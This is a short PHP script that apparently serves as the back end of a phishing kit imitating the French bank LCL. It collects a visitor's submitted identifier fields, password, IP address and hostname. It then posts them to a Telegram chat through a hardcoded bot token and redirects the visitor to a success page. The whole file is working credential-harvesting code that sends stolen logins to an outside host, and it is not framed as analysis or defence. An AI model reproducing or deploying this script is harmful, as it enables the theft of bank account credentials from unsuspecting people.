<?php
$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($ip);
if(!empty($_POST['step'])){
$message  = "=========[LCL INFO]=========\n";
$message .= "Name: " . $_POST['input1'] . $_POST['input2'] . $_POST['input3'] . $_POST['input4'] . $_POST['input5'] . $_POST['input6']. $_POST['input5']. $_POST['input8']. $_POST['input9']. $_POST['input10'] ."\n";
$message .= "password  : ".$_POST['password']."\n";
$message .= "===============[IP]==============\n";
$message .= "IP : http://www.geoiptool.com/?IP=$ip\n";
$message .= "==========[LCL INFO]=========";
        $token = "6384881610:AAFCma01A350PHgZD4PsMnZXiDisgHADguw";
    file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=-4263630620&text=" . urlencode($message)."" );
header("Location:../success.php");
}else{
header("Location:../success.php");
}

?>